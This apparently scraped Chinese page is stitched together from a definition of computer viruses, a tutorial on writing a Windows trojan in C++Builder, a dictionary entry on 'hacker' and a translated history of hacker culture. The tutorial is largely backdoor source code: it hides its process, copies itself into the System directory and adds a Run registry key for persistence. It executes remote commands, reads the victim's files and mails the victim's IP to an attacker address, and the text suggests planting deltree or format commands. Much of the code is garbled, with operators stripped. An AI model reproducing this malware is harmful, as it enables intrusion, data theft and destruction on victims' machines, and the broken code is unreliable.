last黑客是什么（手机黑客软件下载）

什么是黑客?什么是电脑病毒?是怎么作的?

什么是计算机病毒

计算机病毒是一个程序，一段可执行码。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓

延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随

同文件一起蔓延开来。

除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎

仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不

寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。

可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序

的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为

制造的程序,它通过不同的途径潜伏或寄生在存储媒体（如磁盘、内存）或程序里。当某种条件或时机成熟时,它会自生复制

并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒

所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复

制, 具有传染性。

所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质（或程序）里, 当达到某种条件时即被激活的具有对计

算机资源进行破坏作用的一组程序或指令集合。

参考：

木马是如何编写的（一）

武汉 周侃

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷，使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！呵呵，要知道，木马（Trojan）的历史是很悠久的：早在ATT Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成??服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：

{

DWORD dwVersion = GetVersion();

// 得到操作系统的版本号

if (dwVersion = 0x80000000)

// 操作系统是Win9x，不是WinNt

{

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

file://定义RegisterServiceProcess()函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary("KERNEL32");

file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

file://得到RegisterServiceProcess()函数的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1);

file://执行RegisterServiceProcess()函数,隐藏本进程

FreeLibrary(hDLL);

file://卸载动态链接库

}

}

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

{

char TempPath[MAX_PATH];

file://定义一个变量

GetSystemDirectory(TempPath ,MAX_PATH);

是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString(TempPath);

file://格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);

file://将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

Registry=new TRegistry;

file://定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry-RootKey=HKEY_LOCAL_MACHINE;

file://设置主键为HKEY_LOCAL_MACHINE

Registry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

{

file://如果以下语句发生异常，跳至catch，以避免程序崩溃

if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");

file://查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

file://如果不是，就写入以上键值和内容

}

catch(...)

{

file://如果有错误，什么也不做

}

}

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

{

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

file://定义了一堆待会儿要用到的变量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());

file://在%System%下建立一个文本文件Win369.bat，作为临时文件使用

AnsiString temp=Socket-ReceiveText();

file://接收客户端（攻击者，也就是你自己）传来的数据

}

好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：

{

if(temp.SubString(0,9)=="edit conf")

file://如果接受到的字符串的前9个字符是“edit conf”

{

int number=temp.Length();

file://得到字符串的长度

int file_name=atoi((temp.SubString(11,1)).c_str());

file://将第11个字符转换成integer型，存入file_name变量

file://为什么要取第11个字符，因为第10个字符是空格字符

content=(temp.SubString(12,number-11)+'\n').c_str();

file://余下的字符串将被作为写入的内容写入目标文件

FILE *fp=NULL;

char filename[20];

chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

chmod("c:\\config.sys",S_IREADS_IWRITE);

file://将两个目标文件的属性改为可读可写

if(file_name==1)

sprintf(filename,"%s","c:\\autoexec.bat");

file://如果第11个字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys");

file://如果第11个字符是1,就把Config.sys格式化

times_of_try=0;

file://定义计数器

while(fp==NULL)

{

file://如果指针是空

fp=fopen(filename,"a+");

file://如果文件不存在，创建之；如果存在，准备在其后添加

file://如果出错，文件指针为空，这样就会重复

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://跳至END处

}

}

fwrite(content,sizeof(char),strlen(content),fp);

file://写入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！

fclose(fp);

file://写完后关闭目标文件

Socket-SendText("Sucess");

file://然后发回“Success”的成功信息

}

}

上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲?：

{

else if(temp.SubString(0,3)=="dir")

{

file://如果前3个字符是“dir”

int Read_Num;

char * CR_LF="\n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length();

file://得到字符串的长度

AnsiString Dir_Name=temp.SubString(5,number-3);

file://从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if(Dir_Name=="")

{

file://如果目录名为空

Socket-SendText("Fail By Open DIR's Name");

file://返回“Fail By Open DIR's Name”信息

goto END;

file://跳到END

}

char * dirname;

dirname=Dir_Name.c_str();

if ((dir = opendir(dirname)) == NULL)

{

file://如果打开目录出错

Socket-SendText("Fail by your DIR's name!");

file://返回“Fail By Your DIR's Name”信息

goto END;

file://跳到END

}

times_of_try=0;

while(fp==NULL)

{

file://如果指针是NULL

fp=fopen(TempFile,"w+");

file://就创建system\Win369.bat准备读和写；如果此文件已存在，则会被覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功（真有耐心！）

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

}

while ((ent = readdir(dir)) != NULL)

{

file://如果访问目标目录成功

if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一个字符不是“\”，证明不是根目录

filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();

file://加上“\”字符后将指针指向目录流

else

filename=(AnsiString(dirname)+ent-d_name).c_str();

file://如果是根目录，则不用加“\”

attrib=_rtl_chmod(filename, 0);

file://得到目标文件的访问属性

if (attrib FA_RDONLY)

file://“”字符是比较前后两个变量，如果相同返回1,否则返回0

fwrite(" R",sizeof(char),3,fp);

file://将目标文件属性设为只读

else

fwrite(" ",sizeof(char),3,fp);

file://失败则写入空格

if (attrib FA_HIDDEN)

fwrite("H",sizeof(char),1,fp);

file://将目标文件属性设为隐藏

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_SYSTEM)

fwrite("S",sizeof(char),1,fp);

file://将目标文件属性设为系统

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_ARCH)

fwrite("A",sizeof(char),1,fp);

file://将目标文件属性设为普通

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_DIREC)

fwrite(" DIR ",sizeof(char),9,fp);

file://将目标文件属性设为目录

else

fwrite(" ",sizeof(char),9,fp);

file://失败则写入空格

fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);

file://将目录名写入目标文件

fwrite(CR_LF,1,1,fp);

file://写入换行

}

fclose(fp);

file://关闭文件

closedir(dir);

file://关闭目录

FILE *fp1=NULL;

times_of_try=0;

while(fp1==NULL)

{

fp1=fopen(TempFile,"r");

file://打开Win369.bat准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定义的一个空数组

Read_Num=fread(temp_content,1,300,fp1);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

变量加上刚才的300个字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp1);

file://重复

};

Return_Text=Return_Text+temp_content;

变量加上刚才的300个字符

fclose(fp1);

file://关闭目标文件

Socket-SendText(Return_Text);

file://返回Return_Text变量的内容

}

}

够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

{

else if(temp.SubString(0,4)=="type")

{

file://如果前4个字符是“type”

int Read_Num;

int number=temp.Length();

AnsiString File_Name=temp.SubString(6,number-4);

file://将目标文件流存入File_Name变量中

times_of_try=0;

while(fp==NULL)

{

fp=fopen(File_Name.c_str(),"r");

file://打开目标文件准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已试了100次了

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的错误信息

goto END;

file://跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

file://定义一个空数组

Read_Num=fread(temp_content,1,300,fp);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

的内容加上刚才的字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp);

file://重复

};

Return_Text=Return_Text+temp_content;

的内容加上刚才的字符

fclose(fp);

file://关闭目标文件

Socket-SendText(Return_Text);

file://返回Return_Text的内容，即你查看文件的内容

}

}

咳咳！累死了！还是来点轻松的吧??操纵目标机的光驱（注意：mciSendString()函数的声明在mmsystem.h头文件中）：

{

else if(temp=="open")

{

file://如果收到的temp的内容是“open”

mciSendString("set cdaudio door open", NULL, 0, NULL);

file://就弹出光驱的托盘

}

else if(temp=="close")

{

file://如果收到的temp的内容是“close”

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

file://就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

}

}

接着就是交换目标机的鼠标左右键，代码如下：

{

else if(temp=="swap")

{

SwapMouseButton(1);

file://交换鼠标左右键，简单吧？

}

}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

{

else if(temp=="reboot")

{

file://如果收到的temp的内容是“temp”

DWORD dwVersion = GetVersion();

file://得到操作系统的版本号

if (dwVersion 0x80000000)

{

file://操作系统是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

file://定义变量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);

这个函数的作用是打开一个进程的访问令牌

函数的作用是得到本进程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);

的作用是修改进程的权限

tkp.PrivilegeCount = 1;

file://赋给本进程特权

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

的作用是通知Windows NT修改本进程的权利

ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

file://强行退出WinNt并重启

}

else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

file://强行退出Win9x并重启

}

}

如果以上都不是，就让它在Dos窗口中执行传来的命令：

{

else

{

file://如果都不是

char * CR_TF="\n";

times_of_try=0;

while(fp==NULL)

{

fp=fopen(TempFile,"w+");

file://创建Win369.bat，如果已存在就覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的信息

goto END;

file://跳到END

}

}

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

file://写入欲执行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

file://写入换行符

fclose(fp);

file://关闭Win369.bat

system(TempFile);

file://执行Win369.bat

Socket-SendText("Success");

file://返回“Success”信息

}

}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。^_^

到此，服务器程序的功能已全部完成，但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友，别走开！（未完待续）

木马是如何编写的（三）

武汉 周侃

上次已编写完服务器端的各种功能，但还差容错部分还未完成,下面我们Go on! 其代码如下（照敲不误 ^_^）：

{

END:;

Socket-Close();

file://关闭服务

ServerSocket1-Active =true;

file://再次打开服务

if (NMSMTP1-Connected) NMSMTP1-Disconnect();

file://如果SMTP服务器已连接则断开

NMSMTP1-Host = "smtp.163.net";

file://选一个好用的SMTP服务器，如163、263、sina和btamail

NMSMTP1-UserID = "";

file://你SMTP的ID

try

{

NMSMTP1-Connect();

file://再次连接

}

catch(...)

{

goto NextTime;

file://跳到NextTime

}

NMSMTP1-PostMessage-FromAddress ="I don't know!";

file://受害者的Email地址

NMSMTP1-PostMessage-FromName = "Casualty";

file://受害者的名字

NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848.net";

file://将信发到我的邮箱，这一步很关键

NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;

file://信的内容提示你“服务器正在运行”，并且告诉你受害者的目前的IP地址，以便连接

NMSMTP1-PostMessage-Subject = "Server Runn

求助：黑客的英文解释

hacker

[hAkL;hAkE]

(电脑)打手

In computer programming, a person who is an exceptionally skilled computer programmer, and programs computers for recreation or as hobby.

在计算机程序设计领域中,一个非常熟练的计算机程序设计员,他出于娱乐爱好而热衷于编制新程序。

In computer virus, a person who “breaks into” computers without authorizati on, either for malicious reasons or just to prove it can be done.

一个未经许可“侵入”计算机程序系统的人,他或是怀有恶意破坏计算机程序系统,或只是为了显示自己的能力而制造计算机病毒。参阅computer security。

In data security, an unauthorized user who tries to gain entry to a computer network by defeating the system's access controls.

在数据安全领域,一种未经授权、又企图躲过系统存取控制程序的检查而进入计算机网络的用户。

有关黑客的一切

黑客是对英语hacker的翻译，hacker原意是指用斧头砍材的工人，最早被引进计算机圈则可追溯自1960年代。他们破解系统或者网络基本上是一项业余嗜好，通常是出于自己的兴趣，而非为了赚钱或工作需要。

加州柏克莱大学计算机教授Brian Harvey在考证此字时曾写到，当时在麻省理工学院中(MIT)的学生通常分成两派，一是tool，意指乖乖牌学生，成绩都拿甲等；另一则是所谓的hacker，也就是常逃课，上课爱睡觉，但晚上却又精力充沛喜欢搞课外活动的学生。 这跟计算机有什么关系？一开始并没有。不过当时hacker也有区分等级，就如同tool用成绩比高下一样。真正一流hacker并非整天不学无术，而是会热衷追求某种特殊嗜好，比如研究电话、铁道(模型或者真的)、科幻小说，无线电，或者是计算机。也因此后来才有所谓的computer hacker出现，意指计算机高手。

有些人很强调黑客和骇客的区别，根据开放原始码计划创始人Eric Raymond（他本人也是个著名的hacker）对此字的解释，hacker与cracker（一般译为骇客，有时也叫“黑帽黑客”。 ）是分属两个不同世界的族群，基本差异在于，黑客是有建设性的，而骇客则专门搞破坏。 对一个黑客来说,学会入侵和破解是必要的,但最主要的还是编程,毕竟,使用工具是体现别人的思路,而程序是自己的想法.一句话--编程实现一切。对于一个骇客来说,他们只追求入侵的快感,不在乎技术,他们不会编程,不知道入侵的具体细节。还有一种情况是试图破解某系统或网络以提醒该系统所有者的系统安全漏洞，这群人往往被称做“白帽黑客”或“匿名客”(sneaker)或红客。许多这样的人是电脑安全公司的雇员，并在完全合法的情况下攻击某系统。

但到了今天，在知识贫乏的记者写的媒报道中，黑客一词已被用于泛指黑客和骇客，因此也影响了大众对黑客的理解。 这个背景下，就出现了重新定义黑客内涵的努力，试图把黑客的活动范围限定为不为经济利益、而是出于好奇心做出技术探索和挑战。

黑客文化简史

本篇原作者为Eric S. Raymond esr@snark.thyrsus.com，他是一位大哥级的 Hacker，写了很多自由软件，知名著作有Jargon File等，近年来发表“大教堂与集市”论文为Opensource software努力，Netscape 愿意公开Navigator的原始码，与这篇文章有很大的关系。

序曲: Real Programmer

故事一开始，我要介绍的是所谓的Real Programmer。

他们从不自称是Real Programmer、Hacker或任何特殊的称号；`Real Programmer' 这个名词是在1980年代才出现，但早自1945年起，电脑科学便不断地吸引世界上头脑最顶尖、想像力最丰富的人投入其中。从Eckert Mauchly发明ENIAC后，便不断有狂热的programmer投入其中，他们以撰写软件与玩弄各种程式设计技巧为乐，逐渐形成具有自我意识的一套科技文化。当时这批Real Programmers主要来自工程界与物理界，他们戴著厚厚的眼镜， 穿聚酯纤维T恤与纯白袜子，用机器语言、汇编语言、FORTRAN及很多古老的 语言写程式。他们是Hacker时代的先驱者，默默贡献，却鲜为人知。

从二次大战结束后到1970早期，是打卡计算机与所谓"大铁块"的mainframes 流行的年代，由Real Programmer主宰电脑文化。Hacker传奇故事如有名的 Mel (收录在Jargon File中)、Murphy's Law的各种版本、mock- German`Blinke_nlight' 文章都是流传久远的老掉牙笑话了。

※译者：Jargon File亦是本文原作者所编写的，里面收录了很多Hacker用语、缩写意义、传奇故事等等。Jargon File有出版成一本书：The New Hacker's Dictionary，MIT PRESS出版。也有Online版本:

※译者：莫非定律是：当有两条路让你抉择，若其中一条会导致失败，你一定会选到它。 它有很多衍生说法： 比如一个程式在demo前测试几千几万次都正确无误，但demo 那一天偏偏就会出bug。

一些Real Programmer仍在世且十分活跃 (本文写在1996年)。超级电脑Cray 的设计者Seymour Cray， 据说亲手设计Cray全部的硬体与其操作系统，作业系统是他用机器码硬干出来的，没有出过任何bug或error。Real Programmer 真是超强！

举个比较不那么夸张的例子：Stan Kelly-Bootle，The Devil's DP Dictionary 一书的作者(McGraw-Hill， 1981年初版，ISBN 0-07-034022-6)与Hacker 传奇专家，当年在一台Manchester Mark I开发程式。 他现在是电脑杂志的专栏作家，写一些科学幽默小品，文笔生动有趣投今日hackers所好，所以很受欢迎。 其他人像David E. Lundstorm，写了许多关於Real Programmer的小故事，收录在A few Good Men From UNIVAC这本书，1987年出版，ISBN-0- 262-62075-8。

※译：看到这里，大家应该能了解，所谓Real Programmer指的就是用组合语 言或甚至机器码，把程式用打卡机punch出一片片纸卡片，由主机读卡机输入电脑的那种石器时代Programmer。

Real Programmer的时代步入尾声，取而代之的是逐渐盛行的Interactive computing，大学成立电算相关科系及电脑网络。它们催生了另一个持续的工程传统，并最终演化为今天的开放代码黑客文化。

早期的黑客

Hacker时代的滥觞始於1961年MIT出现第一台电脑DEC PDP-1。MIT的Tech Model Railroad Club(简称TMRC)的Power and Signals Group买了这台机器后，把它当成最时髦的科技玩具，各种程式工具与电脑术语开始出现，整个环境与文化一直发展下去至今日。 这在Steven Levy的书`Hackers' 前段有详细的记载(Anchor/Doubleday 公司，1984年出版，ISBN 0-385-19195-2)。

※译：Interactive computing并非指Windows、GUI、WYSIWYG等介面， 当时有terminal、有shell可以下指令就算是Interactive computing了。 最先使用Hacker这个字应该是MIT。1980年代早期学术界人工智慧的权威：MIT 的Artificial Intelligence Laboratory，其核心人物皆来自TMRC。从1969年起，正好是ARPANET建置的第一年，这群人在电脑科学界便不断有重大突破与贡献。

ARPANET是第一个横跨美国的高速网络。由美国国防部所出资兴建，一个实验性 质的数位通讯网络，逐渐成长成联系各大学、国防部承包商及研究机构的大网络。各地研究人员能以史无前例的速度与弹性交流资讯，超高效率的合作模式导致科技的突飞猛进。

ARPANET另一项好处是，资讯高速公路使得全世界的hackers能聚在一起，不再像以前孤立在各地形成一股股的短命文化，网络把他们汇流成一股强大力量。 开始有人感受到Hacker文化的存在，动手整理术语放上网络， 在网上发表讽刺文学与讨论Hacker所应有的道德规范。(Jargon File的第一版出现在1973年，就是一个好例子)， Hacker文化在有接上ARPANET的各大学间快速发展，特别是(但不全是)在信息相关科系。

一开始，整个Hacker文化的发展以MIT的AI Lab为中心，但Stanford University 的Artificial Intelligence Laboratory(简称SAIL)与稍后的Carnegie-Mellon University(简称CMU)正快速崛起中。三个都是大型的资讯科学研究中心及人工智慧的权威，聚集著世界各地的精英，不论在技术上或精神层次上，对Hacker文化都有极高的贡献。

为能了解后来的故事，我们得先看看电脑本身的变化；随著科技的进步，主角MIT AI Lab也从红极一时到最后淡出舞台。

从MIT那台PDP-1开始，Hacker们主要程式开发平台都是Digital Equipment Corporation 的PDP迷你电脑序列。DEC率先发展出商业用途为主的interactive computing及time-sharing操作系统，当时许多的大学都是买DEC的机器， 因为它兼具弹性与速度，还很便宜(相对於较快的大型电脑mainframe)。 便宜的分时系统是Hacker文化能快速成长因素之一，在PDP流行的时代， ARPANET上是DEC机器的天下，其中最重要的便属PDP-10，PDP-10受到Hacker们的青睐达十五年；TOPS-10(DEC的操作系统)与MACRO-10(它的组译器)，许多怀旧的术语及Hacker传奇中仍常出现这两个字。

MIT像大家一样用PDP-10，但他们不屑用DEC的操作系统。他们偏要自己写一个：传说中赫赫有名的ITS。

ITS全名是`Incompatible Timesharing System'，取这个怪名果然符合MIT的搞怪作风——就是要与众不同，他们很臭屁但够本事自己去写一套操作系统。ITS始终不稳，设计古怪，bug也不少，但仍有许多独到的创见，似乎还是分时系统中开机时间最久的纪录保持者。

ITS本身是用汇编语言写的，其他部分由LISP写成。LISP在当时是一个威力强大与极具弹性的程式语言；事实上，二十五年后的今天，它的设计仍优於目前大多数的程式语言。LISP让ITS的Hacker得以尽情发挥想像力与搞怪能力。LISP是MIT AI Lab成功的最大功臣，现在它仍是Hacker们的最爱之一。

很多ITS的产物到现在仍活著；EMACS大概是最有名的一个，而ITS的稗官野史仍为今日的Hacker们所津津乐道，就如同你在Jargon File中所读到的一般。在MIT红得发紫之际，SAIL与CMU也没闲著。SAIL的中坚份子后来成为PC界或图形使用者介面研发的要角。CMU的Hacker则开发出第一个实用的大型专家系统与工业用机器人。

另一个Hacker重镇是XEROX PARC公司的Palo Alto Research Center。从1970初期到1980中期这十几年间，PARC不断出现惊人的突破与发明，不论质或量，软件或硬体方面。如现今的视窗滑鼠介面，雷射印表机与区域网络；其D系列的机器，催生了能与迷你电脑一较长短的强力个人电脑。不幸这群先知先觉者并不受到公司高层的赏识；PARC是家专门提供好点子帮别人赚钱的公司成为众所皆知的大笑话。即使如此，PARC这群人对Hacker文化仍有不可抹灭的贡献。1970年代与PDP-10文化迅速成长茁壮。Mailing list的出现使世界各地的人得以组成许多SIG(Special-interest group)，不只在电脑方面，也有社会与娱乐方面的。DARPA对这些非`正当性'活动睁一只眼闭一只眼， 因为靠这些活动会吸引更多的聪明小伙子们投入电脑领域呢。

有名的非电脑技术相关的ARPANET mailing list首推科幻小说迷的，时至今日ARPANET变成Internet，愈来愈多的读者参与讨论。Mailing list逐渐成为一种公众讨论的媒介，导致许多商业化上网服务如CompuServe、Genie与Prodigy的成立。

Unix的兴起

此时在新泽西州的郊外，另一股神秘力量积极入侵Hacker社会，终於席卷整个PDP-10的传统。它诞生在1969年，也就是ARPANET成立的那一年，有个在ATT Bell Labs的年轻小夥子Ken Thompson发明了Unix。

Thomspon曾经参与Multics的开发，Multics是源自ITS的操作系统，用来实做当时一些较新的OS理论，如把操作系统较复杂的内部结构隐藏起来，提供一个介面，使的programmer能不用深入了解操作系统与硬体设备，也能快速开发程式。

※译：那时的programmer写个程式必须彻底了解操作系统内部，或硬体设备。比方说写有IO的程式，对於硬碟的转速，磁轨与磁头数量等等都要搞的一清二楚才行。

在发现继续开发Multics是做白工时，Bell Labs很快的退出了(后来有一家公司Honeywell出售Multics，赔的很惨)。

Ken Thompson很喜欢Multics上的作业环境，於是他在实验室里一台报废的DEC PDP-7上胡乱写了一个操作系统， 该系

统在设计上有从Multics抄来的也有他自己的构想。他将这个操作系统命名Unix，用来反讽Multics。

※译：其实是Ken Thompson写了一个游戏`Star Travel' 没地方跑，就去找一台的报废机器PDP-7来玩。他同事Brian Kernighan嘲笑Ken Thompson说：“你写的系统好逊哦，乾脆叫Unics算了。”（Unics发音与太监的英文eunuches一样），后来才改为Unix。

他的同事Dennis Ritchie，发明了一个新的程式语言C，於是他与Thompson用C把原来用汇编语言写的Unix重写一遍。C的设计原则就是好用，自由与弹性，C与Unix很快地在Bell Labs得到欢迎。1971年Thompson与Ritchie争取到一个办公室自动化系统的专案，Unix开始在Bell Labs中流行。不过Thompson与Ritchie的雄心壮志还不止於此。

那时的传统是，一个操作系统必须完全用汇编语言写成，始能让机器发挥最高的效能。Thompson与Ritchie，是头几位领悟硬体与编译器的技术，已经进步到作业系统可以完全用高阶语言如C来写，仍保有不错的效能。五年后，Unix已经成功地移植到数种机器上。

